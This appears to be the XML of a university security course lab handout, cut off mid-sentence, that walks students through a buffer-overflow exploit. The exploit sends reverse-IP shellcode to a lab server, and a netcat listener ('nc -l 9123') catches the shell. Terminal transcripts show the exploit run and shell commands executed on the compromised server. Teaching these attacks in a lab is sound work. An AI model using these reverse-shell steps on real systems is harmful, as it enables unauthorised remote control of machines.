                              <w:t>receive data address is in range: 0xdeec1000-0xf756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C8B0" id="Text Box 23" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:-1pt;margin-top:3.1pt;width:410.3pt;height:18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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="78893151" w14:textId="77777777" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00B3148E">
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>yingjiul@</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>jaguar</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>:~</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">/cis436/w6$ </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00B3148E">
                        <w:rPr>
                          <w:color w:val="4472C4" w:themeColor="accent1"/>
                        </w:rPr>
                        <w:t>server</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4235DB6C" w14:textId="77777777" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00B3148E">
                      <w:r>
                        <w:t>server is ready...</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="272FA6C3" w14:textId="77777777" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00B3148E">
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>handle_conn</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="6A1D4939" w14:textId="77777777" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00B3148E">
                      <w:r>
                        <w:t>receive data address is in range: 0xf7729000-0xf772a000</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="008F0D5E" w14:textId="77777777" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00B3148E">
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>handle_conn</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="0B0073B8" w14:textId="77777777" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00B3148E">
                      <w:r>
                        <w:t>receive data address is in range: 0xf7729000-0xf772a000</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2B63FF89" w14:textId="77777777" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00B3148E">
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>handle_conn</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="4FA682E8" w14:textId="364EF7C2" w:rsidR="00B3148E" w:rsidRDefault="00B3148E" w:rsidP="00B3148E">
                      <w:r>
                        <w:t>receive data address is in range: 0xdeec1000-0xf7561000</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C3A1E9" w14:textId="03762651" w:rsidR="0040431C" w:rsidRDefault="0040431C" w:rsidP="002808A1"/>
    <w:p w14:paraId="507486EE" w14:textId="090538BA" w:rsidR="00B33EBE" w:rsidRDefault="00B33EBE" w:rsidP="002808A1">
      <w:r>
        <w:t xml:space="preserve">And run a client </w:t>
      </w:r>
      <w:r w:rsidR="005B5317">
        <w:t xml:space="preserve">(also </w:t>
      </w:r>
      <w:r>
        <w:t>on jaguar)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAF4194" w14:textId="1A73C0DB" w:rsidR="00B33EBE" w:rsidRDefault="00B33EBE" w:rsidP="002808A1"/>
    <w:p w14:paraId="65BA4F39" w14:textId="377E2A5B" w:rsidR="00B33EBE" w:rsidRDefault="00B33EBE" w:rsidP="002808A1"/>
    <w:p w14:paraId="7E2BA711" w14:textId="6BB5385A" w:rsidR="00B33EBE" w:rsidRDefault="00B33EBE" w:rsidP="002808A1"/>
    <w:p w14:paraId="24DDED9C" w14:textId="4914F414" w:rsidR="0040431C" w:rsidRDefault="00FC4902" w:rsidP="002808A1">
      <w:r w:rsidRPr="00FC4902">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 2 </w:t>
      </w:r>
      <w:r w:rsidR="005B5317">
        <w:t>Run a client (</w:t>
      </w:r>
      <w:r w:rsidR="00A30BDA">
        <w:t>e.g., shell</w:t>
      </w:r>
      <w:r w:rsidR="005C6B27">
        <w:t xml:space="preserve"> window </w:t>
      </w:r>
      <w:r w:rsidR="005B5317">
        <w:t xml:space="preserve">on jaguar). </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC4902">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD7C34">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD7C34">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD7C34">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve">command to listen for an incoming </w:t>
      </w:r>
      <w:r w:rsidR="00AD7C34">
        <w:t xml:space="preserve">TCP </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t>connection at port 9</w:t>
      </w:r>
      <w:r w:rsidR="00AD7C34">
        <w:t>123</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70CD3">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>the client</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve">. Once the reverse IP shellcode is executed, the client will receive the incoming connection from </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70CD3">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>the (compromised) server</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36823AA8" w14:textId="02FFE19D" w:rsidR="005B5317" w:rsidRDefault="005B5317" w:rsidP="002808A1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251729920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D7EE3BB" wp14:editId="5D4D04B2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>41753</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>31341</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5102269" cy="275573"/>
                <wp:effectExtent l="0" t="0" r="22225" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="25" name="Text Box 25"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5102269" cy="275573"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:ln w="6350">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="76D7FBFD" w14:textId="2A2685BE" w:rsidR="005B5317" w:rsidRDefault="005B5317">
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="005B5317">
                              <w:t>yingjiul@jaguar</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="005B5317">
                              <w:t xml:space="preserve">:~/cis436/w6$ </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="005B5317">
                              <w:t>nc</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="005B5317">
                              <w:t xml:space="preserve"> -l 9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E3BB" id="Text Box 25" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:3.3pt;margin-top:2.45pt;width:401.75pt;height:2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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="76D7FBFD" w14:textId="2A2685BE" w:rsidR="005B5317" w:rsidRDefault="005B5317">
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="005B5317">
                        <w:t>yingjiul@</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="005B5317">
                        <w:t>jaguar</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="005B5317">
                        <w:t>:~</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="005B5317">
                        <w:t xml:space="preserve">/cis436/w6$ </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="005B5317">
                        <w:t>nc</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="005B5317">
                        <w:t xml:space="preserve"> -l 9123</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F31BC3" w14:textId="6EBA055D" w:rsidR="0040431C" w:rsidRDefault="0040431C" w:rsidP="002808A1"/>
    <w:p w14:paraId="37D49130" w14:textId="22F77E51" w:rsidR="0040431C" w:rsidRDefault="00FC4902" w:rsidP="002808A1">
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve">Step 3 The third step is to </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70CD3">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>run the exploit program on</w:t>
      </w:r>
      <w:r w:rsidR="00F6324C">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> another </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70CD3">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidR="00F6324C">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00A30BDA">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">e.g., </w:t>
      </w:r>
      <w:r w:rsidR="005C6B27">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">another </w:t>
      </w:r>
      <w:r w:rsidR="00A30BDA">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="005C6B27">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> window </w:t>
      </w:r>
      <w:r w:rsidR="00F6324C">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>on jaguar)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve">. After the client sends data to the server, the server will send back an “Okay”. At this time, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A70CD3">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>s.fp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A70CD3">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t>has been overwritten.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F252D78" w14:textId="4CF29E64" w:rsidR="0040431C" w:rsidRDefault="00F6324C" w:rsidP="002808A1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251730944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12B3502D" wp14:editId="053241B0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>58455</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>8725</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5098093" cy="638827"/>
                <wp:effectExtent l="0" t="0" r="26670" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="26" name="Text Box 26"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5098093" cy="638827"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:ln w="6350">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7CA349ED" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>yingjiul@jaguar</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t>:~/cis436/w6$ exploit h3</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="46B7A694" w14:textId="1F57FA77" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                            <w:r>
                              <w:t>ok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3502D" id="Text Box 26" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:4.6pt;margin-top:.7pt;width:401.4pt;height:50.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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7CA349ED" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>yingjiul@</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>jaguar</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>:~</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t>/cis436/w6$ exploit h3</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="46B7A694" w14:textId="1F57FA77" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                      <w:r>
                        <w:t>okay</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2418A874" w14:textId="3B393626" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="002808A1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDF284C" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="002808A1"/>
    <w:p w14:paraId="49DC20F7" w14:textId="125E95C2" w:rsidR="0040431C" w:rsidRDefault="00FC4902" w:rsidP="002808A1">
      <w:r w:rsidRPr="00FC4902">
        <w:t>Step 4 The shellcode will be executed and the</w:t>
      </w:r>
      <w:r w:rsidR="00F6324C">
        <w:t xml:space="preserve"> first</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve"> client will receive the incoming connection.</w:t>
      </w:r>
      <w:r w:rsidR="00F6324C">
        <w:t xml:space="preserve"> In this first client, you can execute any shell command of the server (e.g., ls):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABA8032" w14:textId="385A5ECE" w:rsidR="0040431C" w:rsidRDefault="00F6324C" w:rsidP="002808A1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251731968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7DF3D8E7" wp14:editId="1E70190C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>104383</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>35020</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5198301" cy="2350717"/>
                <wp:effectExtent l="0" t="0" r="21590" b="12065"/>
                <wp:wrapNone/>
                <wp:docPr id="27" name="Text Box 27"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5198301" cy="2350717"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:ln w="6350">
                          <a:solidFill>
                            <a:prstClr val="black"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="14C2763A" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>yingjiul@jaguar</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">:~/cis436/w6$ </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>nc</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> -l 9123</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="033E5356" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                            <w:r>
                              <w:t>ls</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="090FA991" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                            <w:r>
                              <w:t>client</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="38E8D04F" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>client.c</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="568C2CBF" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                            <w:r>
                              <w:t>exploit</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5A9D85EF" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>exploit.c</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="682806E6" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                            <w:r>
                              <w:t>server</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="788D7D3C" w14:textId="629DA707" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>server.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D8E7" id="Text Box 27" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:8.2pt;margin-top:2.75pt;width:409.3pt;height:18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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="14C2763A" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>yingjiul@</w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>jaguar</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>:~</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">/cis436/w6$ </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>nc</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> -l 9123</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="033E5356" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                      <w:r>
                        <w:t>ls</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="090FA991" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                      <w:r>
                        <w:t>client</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="38E8D04F" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>client.c</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="568C2CBF" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                      <w:r>
                        <w:t>exploit</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5A9D85EF" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>exploit.c</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="682806E6" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                      <w:r>
                        <w:t>server</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="788D7D3C" w14:textId="629DA707" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00F6324C">
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>server.c</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="441F946C" w14:textId="265B4095" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="002808A1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C9534C" w14:textId="678D42CE" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="002808A1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3148BB85" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="002808A1"/>
    <w:p w14:paraId="45E853EF" w14:textId="77777777" w:rsidR="00241BC4" w:rsidRDefault="00241BC4" w:rsidP="00FC4902"/>
    <w:p w14:paraId="6730B6FD" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00FC4902"/>
    <w:p w14:paraId="4D261D88" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00FC4902"/>
    <w:p w14:paraId="3E1B183E" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00FC4902"/>
    <w:p w14:paraId="63F23631" w14:textId="77777777" w:rsidR="00F6324C" w:rsidRDefault="00F6324C" w:rsidP="00FC4902"/>
    <w:p w14:paraId="3810407F" w14:textId="4760C58C" w:rsidR="00FC4902" w:rsidRDefault="00FC4902" w:rsidP="00FC4902">
      <w:r>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidR="005C6B27">
        <w:t>Hands-on exercise to submit (10% of grade):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62872040" w14:textId="364C41D7" w:rsidR="00FC4902" w:rsidRDefault="00FC4902" w:rsidP="00FC4902">
      <w:r>
        <w:t xml:space="preserve">The files given to you have the IP address and port number hard coded into the program.  Before starting the experiment, you need to </w:t>
      </w:r>
      <w:r w:rsidR="00241BC4">
        <w:t>do the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED2877" w14:textId="77777777" w:rsidR="00FC4902" w:rsidRDefault="00FC4902" w:rsidP="00FC4902">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB2D262" w14:textId="3750791A" w:rsidR="00FC4902" w:rsidRDefault="00FC4902" w:rsidP="00FC4902">
      <w:r>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:r w:rsidR="00E16981">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>184.171.124.101</w:t>
      </w:r>
      <w:r w:rsidR="00E16981" w:rsidRPr="00861B2E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00C958CB">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>(server)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E07FD6" w14:textId="6EC91528" w:rsidR="00FC4902" w:rsidRDefault="00FC4902" w:rsidP="005C6B27">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="006A745E">
        <w:t>Each student is given a two-digit number</w:t>
      </w:r>
      <w:r w:rsidR="005C6B27">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C6B27">
        <w:t>xy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A745E">
        <w:t xml:space="preserve"> (please see the end of this document for your number </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A745E">
        <w:t>xy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A745E">
        <w:t>). At Jaguar server, please</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve"> create a new directory named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC4902">
        <w:t>pxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC4902">
        <w:t xml:space="preserve"> under</w:t>
      </w:r>
      <w:r w:rsidR="005C6B27">
        <w:t xml:space="preserve"> your home directory</w:t>
      </w:r>
      <w:r w:rsidR="002F659C">
        <w:t xml:space="preserve"> (e.g., if your number is 05, then the </w:t>
      </w:r>
      <w:r w:rsidR="00644B6B">
        <w:t>new directory</w:t>
      </w:r>
      <w:r w:rsidR="002F659C">
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="00644B6B">
        <w:t xml:space="preserve">named as </w:t>
      </w:r>
      <w:r w:rsidR="002F659C">
